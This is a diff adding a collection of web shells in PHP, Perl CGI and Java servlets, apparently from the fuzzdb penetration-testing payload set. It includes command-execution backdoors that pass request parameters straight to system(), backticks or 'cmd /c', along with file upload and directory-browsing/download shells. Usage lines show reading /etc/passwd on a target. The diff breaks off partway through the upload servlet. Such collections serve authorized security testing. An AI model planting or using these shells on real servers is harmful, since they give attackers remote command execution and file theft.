database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
|
||||
</form>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
17
fuzzdb-webshell/php/simple-backdoor.php
Normal file
17
fuzzdb-webshell/php/simple-backdoor.php
Normal file
|
@ -0,0 +1,17 @@
|
|||
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
|
||||
|
||||
<?php
|
||||
|
||||
if(isset($_REQUEST['cmd'])){
|
||||
echo "<pre>";
|
||||
$cmd = ($_REQUEST['cmd']);
|
||||
system($cmd);
|
||||
echo "</pre>";
|
||||
die;
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
33
fuzzdb-webshell/php/up.php
Normal file
33
fuzzdb-webshell/php/up.php
Normal file
|
@ -0,0 +1,33 @@
|
|||
<?
|
||||
//
|
||||
// PHP_KIT
|
||||
//
|
||||
// up.php = File Upload
|
||||
//
|
||||
// by: The Dark Raver
|
||||
// modified: 21/01/2004
|
||||
//
|
||||
?>
|
||||
|
||||
<html><body>
|
||||
|
||||
<form enctype="multipart/form-data" action="" method="post">
|
||||
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
|
||||
<p>Local File: <input name="userfile" type="file">
|
||||
<p>Remote File: <input name="remotefile" type="text">
|
||||
<input type="submit" value="Send">
|
||||
</form><br><br><br>
|
||||
|
||||
<?
|
||||
|
||||
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
|
||||
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
|
||||
echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
|
||||
} else {
|
||||
echo "No File Uploaded";
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
</html></body>
|
||||
|
67
fuzzdb-webshell/pl-cgi/cmd.pl
Normal file
67
fuzzdb-webshell/pl-cgi/cmd.pl
Normal file
|
@ -0,0 +1,67 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
# PerlKit-0.1 - http://www.t0s.org
|
||||
#
|
||||
# cmd.pl: Run commands on a webserver
|
||||
|
||||
use strict;
|
||||
|
||||
my ($cmd, %FORM);
|
||||
|
||||
$|=1;
|
||||
|
||||
print "Content-Type: text/html\r\n";
|
||||
print "\r\n";
|
||||
|
||||
# Get parameters
|
||||
|
||||
%FORM = parse_parameters($ENV{'QUERY_STRING'});
|
||||
|
||||
if(defined $FORM{'cmd'}) {
|
||||
$cmd = $FORM{'cmd'};
|
||||
}
|
||||
|
||||
print '<HTML>
|
||||
<body>
|
||||
<form action="" method="GET">
|
||||
<input type="text" name="cmd" size=45 value="' . $cmd . '">
|
||||
<input type="submit" value="Run">
|
||||
</form>
|
||||
<pre>';
|
||||
|
||||
if(defined $FORM{'cmd'}) {
|
||||
print "Results of '$cmd' execution:\n\n";
|
||||
print "-"x80;
|
||||
print "\n";
|
||||
|
||||
open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
|
||||
|
||||
while(<CMD>) {
|
||||
print;
|
||||
}
|
||||
|
||||
close(CMD);
|
||||
print "-"x80;
|
||||
print "\n";
|
||||
}
|
||||
|
||||
print "</pre>";
|
||||
|
||||
sub parse_parameters ($) {
|
||||
my %ret;
|
||||
|
||||
my $input = shift;
|
||||
|
||||
foreach my $pair (split('&', $input)) {
|
||||
my ($var, $value) = split('=', $pair, 2);
|
||||
|
||||
if($var) {
|
||||
$value =~ s/\+/ /g ;
|
||||
$value =~ s/%(..)/pack('c',hex($1))/eg;
|
||||
|
||||
$ret{$var} = $value;
|
||||
}
|
||||
}
|
||||
|
||||
return %ret;
|
||||
}
|
116
fuzzdb-webshell/pl-cgi/list.pl
Normal file
116
fuzzdb-webshell/pl-cgi/list.pl
Normal file
|
@ -0,0 +1,116 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
# PerlKit-0.1 - http://www.t0s.org
|
||||
#
|
||||
# browse.pl: Browse and download files from a webserver
|
||||
|
||||
use strict;
|
||||
|
||||
my ($path, %FORM);
|
||||
|
||||
$|=1;
|
||||
|
||||
|
||||
# Get parameters
|
||||
|
||||
%FORM = parse_parameters($ENV{'QUERY_STRING'});
|
||||
|
||||
if(defined $FORM{'path'}) {
|
||||
$path = $FORM{'path'};
|
||||
|
||||
|
||||
} else {
|
||||
$path = "/";
|
||||
}
|
||||
|
||||
if(-f $path) { # Download selected file
|
||||
print "Content-Type: application/octet-stream\r\n";
|
||||
print "\r\n";
|
||||
open(FILE, "< $path") || print "Could not open file\n";
|
||||
|
||||
while(<FILE>) {
|
||||
print;
|
||||
}
|
||||
|
||||
close(FILE);
|
||||
exit;
|
||||
}
|
||||
|
||||
print "Content-Type: text/html\r\n";
|
||||
print "\r\n";
|
||||
|
||||
print '<HTML>
|
||||
<body>
|
||||
<form action="" method="GET">
|
||||
<input type="text" name="path" size=45 value="' . $path . '">
|
||||
<input type="submit" value="List">
|
||||
</form>
|
||||
Directory ' . $path . ' contents:
|
||||
<p>
|
||||
<font face="courier">
|
||||
<table>';
|
||||
|
||||
if(defined $FORM{'path'}) {
|
||||
|
||||
opendir(DIR, $path) || print "Could not open directory";
|
||||
|
||||
foreach (sort(readdir(DIR))) {
|
||||
print get_fileinfo($path, $_). "\n";
|
||||
}
|
||||
|
||||
closedir(DIR);
|
||||
|
||||
}
|
||||
|
||||
print "</table></font>";
|
||||
|
||||
sub parse_parameters ($) {
|
||||
my %ret;
|
||||
|
||||
my $input = shift;
|
||||
|
||||
foreach my $pair (split('&', $input)) {
|
||||
my ($var, $value) = split('=', $pair, 2);
|
||||
|
||||
if($var) {
|
||||
$value =~ s/\+/ /g ;
|
||||
$value =~ s/%(..)/pack('c',hex($1))/eg;
|
||||
|
||||
$ret{$var} = $value;
|
||||
}
|
||||
}
|
||||
|
||||
return %ret;
|
||||
}
|
||||
|
||||
sub get_fileinfo ($$) {
|
||||
my $ret;
|
||||
|
||||
my ($dir,$filename) = @_;
|
||||
my $file = $dir . "/" . $filename;
|
||||
|
||||
$file=~s/\/+/\//g;
|
||||
|
||||
$ret = "<tr>";
|
||||
|
||||
$ret .= "<td>";
|
||||
|
||||
if(-d $file) {
|
||||
$file=~s/\/[^\/]+\/\.\./\//g;
|
||||
$ret .= "<a href=\"?path=$file\">$filename</a>";
|
||||
} else {
|
||||
$ret .= "$filename <a href=\"?path=$file\">[D]</a>" ;
|
||||
}
|
||||
$ret .= "</td>";
|
||||
|
||||
my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
|
||||
|
||||
$ret .= "<td width=30'> </td>";
|
||||
$ret .= "<td>$size</td>";
|
||||
$ret .= "<td>". getpwuid($uid) ."</td>";
|
||||
$ret .= "<td>". getgrgid($gid) ."</td>";
|
||||
|
||||
$ret .= "</tr>";
|
||||
|
||||
return $ret;
|
||||
}
|
34
fuzzdb-webshell/pl-cgi/perlcmd.cgi
Normal file
34
fuzzdb-webshell/pl-cgi/perlcmd.cgi
Normal file
|
@ -0,0 +1,34 @@
|
|||
#!/usr/bin/perl -w
|
||||
|
||||
use strict;
|
||||
|
||||
print "Cache-Control: no-cache\n";
|
||||
print "Content-type: text/html\n\n";
|
||||
|
||||
my $req = $ENV{QUERY_STRING};
|
||||
chomp ($req);
|
||||
$req =~ s/%20/ /g;
|
||||
$req =~ s/%3b/;/g;
|
||||
|
||||
print "<html><body>";
|
||||
|
||||
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
|
||||
|
||||
if (!$req) {
|
||||
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
|
||||
}
|
||||
else {
|
||||
print "Executing: $req";
|
||||
}
|
||||
|
||||
print "<pre>";
|
||||
my @cmd = `$req`;
|
||||
print "</pre>";
|
||||
|
||||
foreach my $line (@cmd) {
|
||||
print $line . "<br/>";
|
||||
}
|
||||
|
||||
print "</body></html>";
|
||||
|
||||
# <!-- http://michaeldaw.org 2006 -->
|
555
fuzzdb-webshell/pl-cgi/up.pl
Normal file
555
fuzzdb-webshell/pl-cgi/up.pl
Normal file
|
@ -0,0 +1,555 @@
|
|||
#!/usr/bin/perl
|
||||
######################################################
|
||||
# upload a file with netscape 2.0+ or IE 4.0+
|
||||
# Muhammad A Muquit
|
||||
# When: Long time ago
|
||||
# Changelog:
|
||||
# James Bee" <JamesBee@home.com> reported that from Windows filename
|
||||
# such as c:\foo\fille.x saves as c:\foo\file.x, Fixed, Jul-22-1999
|
||||
# Sep-30-2000, muquit@muquit.com
|
||||
# changed the separator in count.db to | from :
|
||||
# As in NT : can be a part of a file path, e.g. c:/foo/foo.txt
|
||||
######################################################
|
||||
#
|
||||
# $Revision: 5 $
|
||||
# $Author: Muquit $
|
||||
# $Date: 3/28/04 9:38p $
|
||||
|
||||
#use strict;
|
||||
use CGI;
|
||||
# if you want to restrict upload a file size (in bytes), uncomment the
|
||||
# next line and change the number
|
||||
|
||||
#$CGI::POST_MAX=50000;
|
||||
|
||||
$|=1;
|
||||
|
||||
my $version="V1.4";
|
||||
|
||||
## vvvvvvvvvvvvvvvvvvv MODIFY vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
|
||||
|
||||
# the text database of the user. The text database contains the |
|
||||
# separated items, namely login|encrypted password|upload path
|
||||
# example: muquit|fhy687kq1hger|/usr/local/web/upload/muquit
|
||||
# if no path is specified, the file must be located in the cgi-bin directory.
|
||||
|
||||
#my $g_upload_db="upload.db";
|
||||
|
||||
# overwrite the existing file or not. Default is to overwrite
|
||||
# chanage the value to 0 if you do not want to overwrite an existing file.
|
||||
my $g_overwrite=1;
|
||||
|
||||
# if you want to restrict upload to files with certain extentions, change
|
||||
# the value of $g_restrict_by_ext=1 and ALSO modify the @g_allowed_ext if you
|
||||
# want to add other allowable extensions.
|
||||
my $g_restrict_by_ext=0;
|
||||
# case insensitive, so file with Jpeg JPEG GIF gif etc will be allowed
|
||||
my @g_allowed_ext=("jpeg","jpg","gif","png");
|
||||
|
||||
## ^^^^^^^^^^^^^^^^^^^ MODIFY ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||
|
||||
|
||||
|
||||
#-------------- globals---------- STARTS ------------------
|
||||
my $query=new CGI;
|
||||
my $g_debug=0;
|
||||
|
||||
|
||||
my $g_title="File upload";
|
||||
my $g_upload_path='/tmp';
|
||||
|
||||
#-------------- globals---------- ENDS ------------------
|
||||
|
||||
|
||||
print $query->header;
|
||||
|
||||
# Java Script for form validation
|
||||
#
|
||||
my $JSCRIPT=<<EJS;
|
||||
|
||||
var returnVal=true;
|
||||
var DEBUG=0;
|
||||
|
||||
//===========================================================================
|
||||
// Purpose: check if field is blank or NULL
|
||||
// Params:
|
||||
// field (IN)
|
||||
// errorMsg (IN - MODIFIED)
|
||||
// fieldTitle (IN)
|
||||
// Returns:
|
||||
// errorMsg - error message
|
||||
// Globals:
|
||||
// sets global variable (returnVal) to FALSE if field is blank or NULL
|
||||
// Comments:
|
||||
// JavaScript code adapted from netscape software registration form.
|
||||
// ma_muquit\@fccc.edu, May-09-1997
|
||||
//===========================================================================
|
||||
|
||||
function ValidateAllFields(obj)
|
||||
{
|
||||
returnVal = true;
|
||||
errorMsg = "The required field(s):\\n";
|
||||
|
||||
// make sure all the fields have values
|
||||
if (isSomeFieldsEmpty(obj) == true)
|
||||
{
|
||||
// DISPLAY ERROR MSG
|
||||
displayErrorMsg();
|
||||
returnVal = false;
|
||||
}
|
||||
|
||||
if (returnVal == true)
|
||||
document.forms[0].submit();
|
||||
else
|
||||
return (false);
|
||||
}
|
||||
|
||||
//===========================================================================
|
||||
function displayErrorMsg()
|
||||
{
|
||||
errorMsg += "\\nhas not been completed.";
|
||||
alert(errorMsg);
|
||||
}
|
||||
|
||||
//===========================================================================
|
||||
function isSomeFieldsEmpty(obj)
|
||||
{
|
||||
var
|
||||
returnVal3=false;
|
||||
|
||||
|
||||
|
||||
// check if login is null
|
||||
# if (obj.userid.value == "" || obj.userid.value == null)
|
||||
# {
|
||||
# errorMsg += " " + "Userid" + "\\n";
|
||||
# returnVal3=true;
|
||||
# }
|
||||
|
||||
// check if Password is null
|
||||
|
||||
# if (obj.password.value == "" || obj.password.value == null)
|
||||
# {
|
||||
# errorMsg += " " + "Password" + "\\n";
|
||||
# returnVal3=true;
|
||||
# }
|
||||
|
||||
// check if upload_file is null
|
||||
if (obj.upload_file.value == "" || obj.upload_file.value == null)
|
||||
{
|
||||
errorMsg += " " + "Upload filename" + "\\n";
|
||||
returnVal3=true;
|
||||
}
|
||||
|
||||
return (returnVal3);
|
||||
}
|
||||
|
||||
EJS
|
||||
;
|
||||
|
||||
# print the HTML HEADER
|
||||
&printHTMLHeader;
|
||||
|
||||
if ($query->path_info eq "/author" or $query->path_info eq "/about")
|
||||
{
|
||||
&printForm;
|
||||
&printAuthorInfo;
|
||||
return;
|
||||
}
|
||||
|
||||
if ($query->param)
|
||||
{
|
||||
&doWork();
|
||||
}
|
||||
else
|
||||
{
|
||||
&printForm();
|
||||
}
|
||||
|
||||
##-----
|
||||
# printForm() - print the HTML form
|
||||
##-----
|
||||
sub printForm
|
||||
{
|
||||
|
||||
print "<center>\n";
|
||||
print "<table border=0 bgcolor=\"#c0c0c0\" cellpadding=5 cellspacing=0>\n";
|
||||
|
||||
print $query->start_multipart_form,"\n";
|
||||
|
||||
#------------- userid
|
||||
#print "<tr>\n";
|
||||
#print "<td align=\"right\">\n";
|
||||
#print "Userid:\n";
|
||||
#print "</td>\n";
|
||||
|
||||
#print "<td>\n";
|
||||
#print $query->textfield(-name=>'userid',
|
||||
# -size=>20);
|
||||
#print "</td>\n";
|
||||
#print "</tr>\n";
|
||||
|
||||
#------------- password
|
||||
#print "<tr>\n";
|
||||
#print "<td align=\"right\">\n";
|
||||
#print "Password:\n";
|
||||
#print "</td>\n";
|
||||
|
||||
#print "<td>\n";
|
||||
#print $query->password_field(-name=>'password',
|
||||
# -size=>20);
|
||||
#print "</td>\n";
|
||||
#print "</tr>\n";
|
||||
|
||||
#------------- upload
|
||||
print "<tr>\n";
|
||||
print "<td align=\"right\">\n";
|
||||
print "Upload file:\n";
|
||||
print "</td>\n";
|
||||
|
||||
print "<td>\n";
|
||||
print $query->filefield(-name=>'upload_file',
|
||||
-size=>30,
|
||||
-maxlength=>80);
|
||||
print "</td>\n";
|
||||
print "</tr>\n";
|
||||
|
||||
|
||||
|
||||
#------------- submit
|
||||
print "<tr>\n";
|
||||
print "<td colspan=2 align=\"center\">\n";
|
||||
print "<hr noshade size=1>\n";
|
||||
print $query->submit(-label=>'Upload',
|
||||
-value=>'Upload',
|
||||
-onClick=>"return ValidateAllFields(this.form)"),"\n";
|
||||
print "</td>\n";
|
||||
print "</tr>\n";
|
||||
|
||||
|
||||
|
||||
print $query->endform,"\n";
|
||||
|
||||
print "</table>\n";
|
||||
print "</center>\n";
|
||||
}
|
||||
|
||||
|
||||
|
||||
##------
|
||||
# printHTMLHeader()
|
||||
##------
|
||||
sub printHTMLHeader
|
||||
{
|
||||
print $query->start_html(
|
||||
-title=>"$g_title",
|
||||
-script=>$JSCRIPT,
|
||||
-bgcolor=>"#ffffff",
|
||||
-link=>"#ffff00",
|
||||
-vlink=>"#00ffff",
|
||||
-alink=>"#ffff00",
|
||||
-text=>"#000000");
|
||||
}
|
||||
|
||||
##-------
|
||||
# doWork() - upload file
|
||||
##-------
|
||||
sub doWork
|
||||
{
|
||||
##################
|
||||
my $em='';
|
||||
##################
|
||||
|
||||
|
||||
# import the paramets into a series of variables in 'q' namespace
|
||||
$query->import_names('q');
|
||||
# check if the necessary fields are empty or not
|
||||
#$em .= "<br>You must specify your Userid!<br>" if !$q::userid;
|
||||
#$em .= "You must specify your Password!<br>" if !$q::password;
|
||||
$em .= "You must select a file to upload!<br>" if !$q::upload_file;
|
||||
|
||||
&printForm();
|
||||
if ($em)
|
||||
{
|
||||
&printError($em);
|
||||
return;
|
||||
}
|
||||
|
||||
#if (&validateUser() == 0)
|
||||
#{
|
||||
# &printError("Will not upload! Could not validate Userid: $q::userid");
|
||||
# return;
|
||||
#}
|
||||
|
||||
# if you want to restrict upload to files with certain extention
|
||||
if ($g_restrict_by_ext == 1)
|
||||
{
|
||||
my $file=$q::upload_file;
|
||||
my @ta=split('\.',$file);
|
||||
my $sz=scalar(@ta);
|
||||
if ($sz > 1)
|
||||
{
|
||||
my $ext=$ta[$sz-1];
|
||||
if (! grep(/$ext/i,@g_allowed_ext))
|
||||
{
|
||||
&printError("You are not allowed to upload this file");
|
||||
return;
|
||||
}
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
&printError("You are not allowed to upload this file");
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
# now upload file
|
||||
&uploadFile();
|
||||
|
||||
if ($g_debug == 1)
|
||||
{
|
||||
my @all=$query->param;
|
||||
my $name;
|
||||
foreach $name (@all)
|
||||
{
|
||||
print "$name ->", $query->param($name),"<br>\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
##------
|
||||
# printError() - print error message
|
||||
##------
|
||||
sub printError
|
||||
{
|
||||
my $em=shift;
|
||||
print<<EOF;
|
||||
<center>
|
||||
<hr noshade size=1 width="80%">
|
||||
<table border=0 bgcolor="#000000" cellpadding=0 cellspacing=0>
|
||||
<tr>
|
||||
<td>
|
||||
<table border=0 width="100%" cellpadding=5 cellspacing=1>
|
||||
<tr">
|
||||
<td bgcolor="#ffefd5" width="100%">
|
||||
|
||||
<font color="#ff0000"><b>Error -</b></font>
|
||||
$em</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
</center>
|
||||
EOF
|
||||
;
|
||||
}
|
||||
|
||||
##--
|
||||
# validate login name
|
||||
# returns 1, if validated successfully
|
||||
# 0 if validation fails due to password or non existence of login
|
||||
# name in text database
|
||||
##--
|
||||
sub validateUser
|
||||
{
|
||||
my $rc=0;
|
||||
my ($u,$p);
|
||||
#my $userid=$query->param('userid');
|
||||
#my $plain_pass=$query->param('password');
|
||||
|
||||
# open the text database
|
||||
unless(open(PFD,$g_upload_db))
|
||||
{
|
||||
my $msg=<<EOF;
|
||||
Could not open user database: $g_upload_db
|
||||
<br>
|
||||
Reason: $!
|
||||
<br>
|
||||
Make sure that your web server has read permission to read it.
|
||||
EOF
|
||||
;
|
||||
&printError("$msg");
|
||||
return;
|
||||
}
|
||||
|
||||
# first check if user exist
|
||||
$g_upload_path='';
|
||||
my $line='';
|
||||
while (<PFD>)
|
||||
{
|
||||
$line=$_;
|
||||
chomp($line);
|
||||
# get rid of CR
|
||||
$line =~ s/\r$//g;
|
||||
($u,$p,$g_upload_path)=split('\|',$line);
|
||||
#if ($userid eq $u)
|
||||
#{
|
||||
# $rc=1;
|
||||
# last;
|
||||
#}
|
||||
}
|
||||
close(PFD);
|
||||
|
||||
if (crypt($plain_pass,$p) ne $p)
|
||||
{
|
||||
$rc=0;
|
||||
}
|
||||
|
||||
return ($rc);
|
||||
}
|
||||
|
||||
##--------
|
||||
# uploadFile()
|
||||
##--------
|
||||
sub uploadFile
|
||||
{
|
||||
my $bytes_read=0;
|
||||
my $size='';
|
||||
my $buff='';
|
||||
my $start_time;
|
||||
my $time_took;
|
||||
my $filepath='';
|
||||
my $filename='';
|
||||
my $write_file='';
|
||||
|
||||
$filepath=$query->param('upload_file');
|
||||
|
||||
# James Bee" <JamesBee@home.com> reported that from Windows filename
|
||||
# such as c:\foo\fille.x saves as c:\foo\file.x, so we've to get the
|
||||
# filename out of it
|
||||
# look at the last word, hold 1 or more chars before the end of the line
|
||||
# that doesn't include / or \, so it will take care of unix path as well
|
||||
# if it happens, muquit, Jul-22-1999
|
||||
if ($filepath =~ /([^\/\\]+)$/)
|
||||
{
|
||||
$filename="$1";
|
||||
}
|
||||
else
|
||||
{
|
||||
$filename="$filepath";
|
||||
}
|
||||
# if there's any space in the filename, get rid of them
|
||||
$filename =~ s/\s+//g;
|
||||
|
||||
$write_file="$g_upload_path" . "/" . "$filename";
|
||||
|
||||
&print_debug("Filename=$filename");
|
||||
&print_debug("Writefile= $write_file");
|
||||
|
||||
if ($g_overwrite == 0)
|
||||
{
|
||||
if (-e $write_file)
|
||||
{
|
||||
&printError("File $filename exists, will not overwrite!");
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
if (!open(WFD,">$write_file"))
|
||||
{
|
||||
my $msg=<<EOF;
|
||||
Could not create file: <code>$write_file</code>
|
||||
<br>
|
||||
It could be:
|
||||
<ol>
|
||||
<li>The upload directory: <code>\"$g_upload_path\"</code> does not have write permission for the
|
||||
web server.
|
||||
<li>The upload.db file has Control character at the end of line
|
||||
</ol>
|
||||
EOF
|
||||
;
|
||||
|
||||
&printError("$msg");
|
||||
return;
|
||||
}
|
||||
|
||||
$start_time=time();
|
||||
while ($bytes_read=read($filepath,$buff,2096))
|
||||
{
|
||||
$size += $bytes_read;
|
||||
binmode WFD;
|
||||
print WFD $buff;
|
||||
}
|
||||
|
||||
&print_debug("size= $size");
|
||||
|
||||
close(WFD);
|
||||
|
||||
if ((stat $write_file)[7] <= 0)
|
||||
{
|
||||
unlink($write_file);
|
||||
&printError("Could not upload file: $filename");
|
||||
return;
|
||||
}
|
||||
else
|
||||
{
|
||||
$time_took=time()-$start_time;
|
||||
print<<EOF;
|
||||
<center>
|
||||
<hr noshade size=1 width="90%">
|
||||
<table border=0 bgcolor="#c0c0c0" cellpadding=0 cellspacing=0>
|
||||
<tr>
|
||||
<td>
|
||||
<table border=0 width="100%" cellpadding=10 cellspacing=2>
|
||||
<tr align="center">
|
||||
<td bgcolor="#000099" width="100%">
|
||||
<font color="#ffffff">
|
||||
File
|
||||
<font color="#00ffff"><b>$filename</b></font> of size
|
||||
<font color="#00ffff"><b>$size</b></font> bytes is
|
||||
uploaded successfully!
|
||||
</font>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
</center>
|
||||
EOF
|
||||
;
|
||||
}
|
||||
}
|
||||
|
||||
sub printAuthorInfo
|
||||
{
|
||||
my $url="http://www.muquit.com/muquit/";
|
||||
my $upl_url="http://muquit.com/muquit/software/upload_pl/upload_pl.html";
|
||||
print<<EOF;
|
||||
<center>
|
||||
<hr noshade size=1 width="90%">
|
||||
<table border=0 bgcolor="#c0c0c0" cellpadding=0 cellspacing=0>
|
||||
<tr>
|
||||
<td>
|
||||
<table border=0 width="100%" cellpadding=10 cellspacing=2>
|
||||
<tr align="center">
|
||||
<td bgcolor="#000099" width="100%">
|
||||
<font color="#ffffff">
|
||||
<a href="$upl_url">
|
||||
upload.pl</a> $version by
|
||||
<a href="$url">Muhammad A Muquit</A>
|
||||
</font>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</table>
|
||||
</center>
|
||||
EOF
|
||||
;
|
||||
}
|
||||
|
||||
sub print_debug
|
||||
{
|
||||
my $msg=shift;
|
||||
if ($g_debug)
|
||||
{
|
||||
print "<code>(debug) $msg</code><br>\n";
|
||||
}
|
||||
}
|
43
fuzzdb-webshell/servlet/CmdServlet.java
Normal file
43
fuzzdb-webshell/servlet/CmdServlet.java
Normal file
|
@ -0,0 +1,43 @@
|
|||
/*
|
||||
* CmdServlet.java 20/01/2004
|
||||
*
|
||||
* @author The Dark Raver
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.*;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
|
||||
public class CmdServlet extends HttpServlet {
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
res.setContentType("text/html");
|
||||
|
||||
PrintWriter out = res.getWriter();
|
||||
out.print("<html><body>");
|
||||
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
|
||||
out.print("<input type=\"text\" name=\"cmd\">");
|
||||
out.print("<input type=\"submit\" value=\"Send\">");
|
||||
out.print("</form>");
|
||||
|
||||
if(req.getParameter("cmd") != null) {
|
||||
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
|
||||
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
|
||||
DataInputStream procIn = new DataInputStream(p.getInputStream());
|
||||
int c='\0';
|
||||
while ((c=procIn.read()) != -1) {
|
||||
out.print((char)c);
|
||||
}
|
||||
}
|
||||
|
||||
out.print("\n<hr></pre>");
|
||||
out.print("</body></html>");
|
||||
}
|
||||
|
||||
public String getServletInfo() {
|
||||
return "CmdServlet 0.1";
|
||||
}
|
||||
|
||||
}
|
86
fuzzdb-webshell/servlet/ListServlet.java
Normal file
86
fuzzdb-webshell/servlet/ListServlet.java
Normal file
|
@ -0,0 +1,86 @@
|
|||
/*
|
||||
* ListServlet.java
|
||||
*
|
||||
* @author Sierra
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.ServletException;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
public class ListServlet extends HttpServlet
|
||||
{
|
||||
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
PrintWriter printwriter = res.getWriter();
|
||||
String path = req.getParameter("file");
|
||||
|
||||
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
|
||||
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
|
||||
if(req.getParameter("file")==null) path = "c:\\";
|
||||
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
|
||||
|
||||
File file = new File(path);
|
||||
|
||||
if(file.isDirectory())
|
||||
{
|
||||
String s = new String("Unknown");
|
||||
String s2 = new String("Black");
|
||||
File afile[] = file.listFiles();
|
||||
for(int i = 0; i < afile.length; i++)
|
||||
{
|
||||
String s1 = new String(afile[i].toString());
|
||||
printwriter.write("(");
|
||||
String s3;
|
||||
if(afile[i].isDirectory())
|
||||
{
|
||||
printwriter.write("d");
|
||||
s1 = s1 + "/";
|
||||
s3 = new String("Blue");
|
||||
} else
|
||||
if(afile[i].isFile())
|
||||
{
|
||||
printwriter.write("-");
|
||||
s3 = new String("Green");
|
||||
} else
|
||||
{
|
||||
printwriter.write("?");
|
||||
s3 = new String("Red");
|
||||
}
|
||||
if(afile[i].canRead())
|
||||
printwriter.write("r");
|
||||
else
|
||||
printwriter.write("-");
|
||||
if(afile[i].canWrite())
|
||||
printwriter.write("w");
|
||||
else
|
||||
printwriter.write("-");
|
||||
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
|
||||
}
|
||||
|
||||
printwriter.write("<hr></FONT></BODY></HTML>");
|
||||
} else
|
||||
if(file.canRead())
|
||||
{
|
||||
FileInputStream fileinputstream = new FileInputStream(file);
|
||||
int j = 0;
|
||||
while(j >= 0)
|
||||
{
|
||||
j = fileinputstream.read();
|
||||
printwriter.write(j);
|
||||
}
|
||||
fileinputstream.close();
|
||||
} else
|
||||
{
|
||||
printwriter.write("Can't Read file<BR>");
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
public String getServletInfo() {
|
||||
return "Directory Listing";
|
||||
}
|
||||
}
|
71
fuzzdb-webshell/servlet/UpServlet.java
Normal file
71
fuzzdb-webshell/servlet/UpServlet.java
Normal file
|
@ -0,0 +1,71 @@
|
|||
/*
|
||||
* UpServlet.java 29/04/2005
|
||||
*
|
||||
* @author The Dark Raver
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.*;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
|
||||
public class UpServlet extends HttpServlet {
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
res.setContentType("text/html");
|
||||
PrintWriter out = res.getWriter();
|
||||
out.print("<html><body>");
|
||||
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
|
||||
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
|
||||
out.print("<input type=\"submit\" value=\"Upload\">");
|
||||
out.print("</form>");
|
||||
out.print("</body></html>");
|
||||
}
|
||||
|
||||
|
||||
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
String tag = new String();
|
||||
int c = '\0';
|
||||
int contador = 0;
|
||||
ServletInputStream in = req.getInputStream();
|
||||
DataInputStream post = new DataInputStream(in);
|
||||
|
||||
PrintWriter out = res.getWriter();
|
||||
res.setContentType("text/html");
|
||||
out.print("<pre>");
|
||||
|
||||
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
|
||||
tag=tag.concat("" + (char)c);
|
||||
contador++;
|
||||
}
|
||||
|
||||
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
|
||||
|
||||
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
|
||||
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
|
||||
|
||||
// (!) Uploaded File Name
|
||||
|
||||
File newfile = new File("c:\\install.log");
|
||||
|
||||
/////////////////////////
|
||||
|
||||
